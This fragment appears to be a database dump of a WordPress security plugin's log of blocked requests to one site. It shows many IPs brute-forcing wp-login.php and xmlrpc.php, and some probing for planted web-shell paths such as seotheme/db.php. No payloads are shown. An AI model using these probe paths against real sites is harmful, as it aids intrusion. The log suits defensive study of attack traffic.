NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','xKFkciaSZEvb97Y1C4QfJoPX',0,1665951261.4433,17861,'','POST',403,0,600,0,1,'',0),('194.233.77.4',3270069508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','PvixyOlSsajet03qzRKIVr9Z',0,1665957068.1165,10462,'','POST',403,0,600,0,1,'',0),('213.152.162.74',3583550026,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','c3fWUn5PELayq7sxpRTN8OvH',0,1665956358.9084,2240,'','POST',403,0,515,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','vsP0beNGJBQ7DAXy3zokmC8T',0,1665955141.5966,1313,'','POST',403,0,600,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','DrRBGEH9O7UaQIcghMPYo4d2',0,1665955112.3399,6026,'','POST',403,0,600,0,1,'',0),('20.235.95.88',350969688,'','http://cteisys.com//wp-content/themes/seotheme/db.php?u','','{\"1\":\"Go-http-client\\/1.1\"}','jUVA6EK9H7XDcNCnw5vFTIM2',0,1665955057.2728,11516,'','GET',403,0,700,0,1,'',0),('213.152.162.15',3583549967,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','X2DkfqiQ5JptErYHI0aFcCAx',0,1665954450.2817,18502,'','POST',403,0,515,0,1,'',0),('20.77.97.187',340615611,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7RuhlEGpPyaVI5XZxw02fn3A',0,1665961324.2446,561,'','GET',403,0,700,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','3LtgHATQDUvdy0ejruV1oW7q',0,1665960972.9523,15433,'','POST',403,0,600,0,1,'',0),('20.77.97.187',340615611,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','IPX4wnjKm3dzuVg5yDcHpLxJ',0,1665961322.7307,330,'','GET',403,0,700,0,1,'',0),('20.25.142.53',337219125,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','3kD1gjbV2Y9fnMvc6RWtea4y',0,1665959912.2879,295,'','GET',403,0,700,0,1,'',0),('20.25.142.53',337219125,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NKTbQnAwSPyHZFrqEJRt1GI7',0,1665959892.4182,11563,'','GET',403,0,700,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','4oGARqi6UsPltd7LHDpCk8Yc',0,1665959047.8394,17587,'','POST',403,0,600,0,1,'',0),('143.244.140.199',2415168711,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','XEw1kKQDNjGSZMx8oULmFRq0',0,1665962951.3791,445,'','POST',403,0,600,0,1,'',0),('128.199.14.4',2160528900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','hFi6sjP2zX8EAOIGygHMltnq',0,1665962920.6282,19216,'','POST',403,0,600,0,1,'',0),('178.128.5.109',2994734445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','hI3LWXJzaFmCcNetsD1PH0yM',0,1665961385.2387,1232,'','POST',403,0,600,0,1,'',0),('192.30.89.51',3223214387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GpSmbI9zUWYwv1RjKCdcB8ni',0,1665968166.1718,19023,'','POST',403,0,515,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','L9KOhcYUTFxj4vPJ0rQtRq73',0,1665966846.6034,1282,'','POST',403,0,600,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','6aOSFxutGQIpoWDgAhvm0PiB',0,1665966816.1558,18589,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','HBWfPFvwpYGLT18nt0NC3Rdc',0,1665965284.8646,17540,'','POST',403,0,600,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','53RQwouDUgcT6aXq8WFBfelS',0,1665964874.9592,2295,'','POST',403,0,600,0,1,'',0),('146.70.61.147',2454076819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zJOBDqhHrldbEGeyN53gM0KP',0,1665971949.8364,18184,'','POST',403,0,515,0,1,'',0),('66.33.193.231',1109508583,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','ruD2R05YpbSLaKGx86HWNZ4X',0,1665970723.5300,1263,'','POST',403,0,600,0,1,'',0),('167.172.105.95',2813094239,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','JBP8Yrjisk73dnREbzMvpfNa',0,1665969185.2208,17918,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','2YQieBo5WRUFcDHhN80tGvxu',0,1665968765.6749,17821,'','POST',403,0,600,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','QHzONZ3cTyiFx9ISvk6fj8BM',0,1665973119.3813,17332,'','POST',403,0,600,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','AiDdu4fOvhWB8EYpajlroS9g',0,1665972699.5111,1260,'','POST',403,0,600,0,1,'',0),('46.19.137.116',773032308,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JVi2cZqtx7zFgQB6XaCSsWhN',0,1665972415.0699,2330,'','POST',403,0,515,0,1,'',0),('107.189.13.99',1807551843,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','uxpSK7B8r4AaJomleRtLNdn2',0,1665972343.1283,467,'','POST',403,0,600,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','M67xNpt18Ilq3LBJ9bFk0eK2',0,1665978627.2248,996,'','POST',403,0,600,0,1,'',0),('192.227.155.193',3236142017,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','rxjvNw5C7Ks8eg1UtTu9yRZf',0,1665978594.0290,9298,'','POST',403,0,600,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','2TmMc80oyAOgpntslbkdNKPq',0,1665977057.3495,1257,'','POST',403,0,600,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','6dKWilT9P3xCF7uOaDbfhABQ',0,1665976645.0571,18656,'','POST',403,0,600,0,1,'',0),('93.114.185.76',1567799628,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','4ZlsAk5m1xqn2tyr9jOBF06p',0,1665982453.3560,525,'','POST',403,0,600,0,1,'',0),('159.203.121.12',2680912140,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','V0o5fwAbiIDx4g2Q6mGHeKPC',0,1665982425.3175,18644,'','POST',403,0,600,0,1,'',0),('152.228.208.88',2565132376,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','Zu6ARDKfJlz07hnvdNjoe12P',0,1665980944.6146,1831,'','POST',403,0,600,0,1,'',0),('172.104.219.25',2892552985,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','iq09CtJP2BVrMaUeWS73fKHR',0,1665980539.1823,12957,'','POST',403,0,600,0,1,'',0),('14.225.255.250',249692154,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','yVv8Sf5eq4uInJbUZRdstC7i',0,1665986252.4693,517,'','POST',403,0,600,0,1,'',0),('157.230.15.115',2649100147,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','PnXgcVZUr291s3FxehYkij0B',0,1665986221.4743,17791,'','POST',403,0,600,0,1,'',0),('85.146.18.88',1435636312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','MD3TiGPvLKgdx0QowumR9fCH',0,1665984722.4952,15270,'','POST',403,0,600,0,1,'',0),('165.22.198.112',2769733232,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','iEhnosK9D5T7H2w3jyQ8FOVg',0,1665984313.4653,17486,'','POST',403,0,600,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','H9DWV4Oey65zhkAsJZLnfIBE',0,1665992094.8043,17552,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','7rVJoKbp5X2HlqLaBMATZecx',0,1665990172.8045,656,'','POST',403,0,600,0,1,'',0),('43.251.133.57',737903929,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','j3DxkWRIYsP67QJBm5Xq4MVn',0,1665990138.6243,18546,'','POST',403,0,600,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','WDKpmc93IEk1yhSj8VaRBzie',0,1665988595.9683,18042,'','POST',403,0,600,0,1,'',0),('146.148.44.185',2459184313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','B6YPqN1HoRLmrWGeigXlQnx9',0,1665988175.9933,17506,'','POST',403,0,600,0,1,'',0),('43.251.133.57',737903929,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','rNPfeqSIGh2jQAnTyzlFYL6d',0,1665992508.9478,17230,'','POST',403,0,600,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','uKCzsc4Qw9yjXqO0EmFxlWSH',0,1665996026.4988,1423,'','POST',403,0,600,0,1,'',0),('51.159.155.6',866097926,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','JtR0Y5OkS7I8T2bMKHXaPrqB',0,1665994076.6559,1265,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','yZQXY8Juj4vMiWSrLa3VoRD5',0,1665994047.3767,17905,'','POST',403,0,600,0,1,'',0),('139.59.85.224',2335921632,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','wvKmPGkp2ELSYNcX0Mba9Hit',0,1666000392.1506,1223,'','POST',403,0,600,0,1,'',0),('39.108.148.88',661427288,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','i6wZjVmTMC9bH3lWRNzDdX01',0,1665999975.2035,17352,'','POST',403,0,600,0,1,'',0),('20.68.176.92',340045916,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','4PeVan1hDw89mGKkCoXFigMB',0,1665999681.4970,284,'','GET',403,0,700,0,1,'',0),('20.68.176.92',340045916,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6bCaIvEVsjR0T5MOLNZ1F4Kq',0,1665999666.9302,12175,'','GET',403,0,700,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','eWOuNrhxyzaj03ToQZ4nqEFV',0,1665998040.3913,641,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','JPqLrlgBKIcvo6AZf0DRhtCw',0,1665998013.5752,18470,'','POST',403,0,600,0,1,'',0),('195.206.105.227',3285084643,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nqLDamG71ZVRUf2xPeQiYETb',0,1665997216.1560,18340,'','POST',403,0,515,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','MIQvpC7SeZ2E09kjViq8Rwux',0,1666004343.3677,10351,'','POST',403,0,600,0,1,'',0),('138.68.180.230',2319758566,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','91hxO0M64GBlK3vpdZ8rE7mN',0,1666003921.6705,18265,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','kLUJD68KdeIrCqEYsgZMu3Fn',0,1666001968.1475,479,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','hBiulO6gaStWcYnPXZdT02Qq',0,1666001936.5105,17219,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','lr9Z5mbG1KkQ4utFdJOhjsva',0,1666007887.2253,17828,'','POST',403,0,600,0,1,'',0),('159.65.24.108',2671843436,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A125F) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.105 Mobile Safari\\/537.36 OPR\\/63.3.3216.58675\"}','9nv2xo6zdgjNutKsPbqwJW4L',0,1666007537.1826,11664,'','GET',403,0,700,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Vt5XqEWrO3lhoCa74kLp2SRz',0,1666005928.1908,1224,'','POST',403,0,600,0,1,'',0),('34.82.166.13',575841805,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','MRvWiKkGV4YnstjdaOErZypL',0,1666005902.4016,572,'','POST',403,0,515,0,1,'',0),('34.82.166.13',575841805,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','dsiyTMYrUAQvD9HWbEJI46NX',0,1666005901.3228,553,'','POST',403,0,515,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','zhCiFMvfdjHTur4byLPqptWR',0,1666005895.6410,1140,'','POST',403,0,600,0,1,'',0),('34.82.166.13',575841805,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','DgHwR4PbtVn7hiplxQWmIAY8',0,1666005899.3092,1553,'','POST',403,0,515,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','CbVfyOepL3xJrF7MPUTg9dlK',0,1666011891.4236,18440,'','POST',403,0,600,0,1,'',0),('47.115.24.165',796072101,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','kUoj2xNzEuXHe5Y7OaSK9RB4',0,1666009904.5989,3308,'','POST',403,0,600,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','KR5bDMlvGm07z6xs9uFVQ4H2',0,1666009874.6546,11354,'','POST',403,0,600,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','UC7izXclm2OoxHdE3rgFNfQJ',0,1666008308.7626,17869,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','oEOziYuML3S7XGVD4K9gc2wa',0,1666008011.4922,574,'','POST',403,0,600,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ucDgE6MR2kazxA5HZGJVFXKo',0,1666012318.8184,17238,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Kh2EAl0sFIpdryTmnzgHt7vQ',0,1666013926.1200,18597,'','POST',403,0,600,0,1,'',0),('81.88.52.8',1364734984,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','16Xnt9i7CJKRpgHOd35Uhw2m',0,1666017977.7334,497,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','h0sYamVLozUMykEISZgC62dp',0,1666017944.3973,18362,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','CJ8YAtQrqcWGeK2vNjLgah6P',0,1666015920.7218,18725,'','POST',403,0,600,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','W7vROG3sXFHdBINUQP9u6Srl',0,1666016348.8566,17273,'','POST',403,0,600,0,1,'',0),('13.69.21.1',222631169,'','https://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','aZL12xkcYH8X0pCmJ6tFPnul',0,1666023316.2841,6392,'','POST',403,0,700,0,1,'',0),('13.69.21.1',222631169,'','http://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','iYd9DcfrNZsq7Gwt4kUnK53v',0,1666023308.5152,13884,'','POST',403,0,700,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) 